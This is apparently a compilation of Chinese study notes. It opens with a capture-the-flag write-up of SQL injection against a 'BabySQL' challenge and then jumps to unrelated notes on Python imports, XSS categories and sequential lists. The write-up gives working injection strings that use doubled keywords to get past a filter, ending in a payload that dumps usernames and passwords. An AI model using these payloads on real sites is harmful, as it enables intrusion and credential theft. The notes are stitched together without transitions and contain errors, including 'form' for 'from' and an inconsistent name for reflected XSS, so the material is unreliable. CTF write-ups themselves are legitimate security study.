相较于旧版本的BabySQL，做了一点过滤。
1'报错
1'#正常回显
由此判断存在注入
构造语句：
1' or 1=1#回显报错为'1=1#'
判断有可能是用str_replace函数替换了敏感词
尝试双写绕过
1' oorr 1=1#正常回显，成功绕过
继续注入
1' oorrder by 3#回显报错'der 3'，说明过滤了by
1' oorrder bbyy 3#回显正常，改变行值判断行数为3
conuite~
1' union select 1,2,3#等尝试以后，发现过滤的关键字有union,select,or,by。兼用双写注入绕过
然后老套路，查看库，表，列。。。
最终的SQL语句为：
1%27+uunionnion+sselectelect+1%2Cgroup_concat(concat_ws(':',id,username,passwoorrd))%2C3 ffromrom b4bsql%23
成功解出flag。

1.编写程序，判断某天是某年第几天。

1. 在 Python 中导入模块中的对象有哪几种方式？（1）

1、导入整个模块，格式为【import 模块1[模块2[,...]]】；
2、与from联用导入整个模块，格式为【form 模块名 import*】；
3、与from联用导入一个或多个对象【from 模块名 import 对象1[，对象2[，对象...]]】。
————————————————

XSS注入分类：DOM型、反弹型、储存型

DOM型：恶意url参数反映在前端页面上。场景：前端
反射型：恶意url向服务器发出请求。场景：根据用户输入反馈结果的模块
存储型：恶意代码注入服务器，前端呈现。场景：留言板功能等

1、顺序表有什么特点和优点？

特点：
（1）存储单元连续；
（2）利用数据元素的存储位置表示线性表中相邻数据元素之间的前后关系，即线性表的逻辑结构与存储结构（物理结构）一致；
（3）随机存储结构；
(4) 存储的密度大。
优点：
（1）不需要为表示元素间的逻辑关系而增加额外的存储空间
（2）在顺序表中可以方便的随机存取任意元素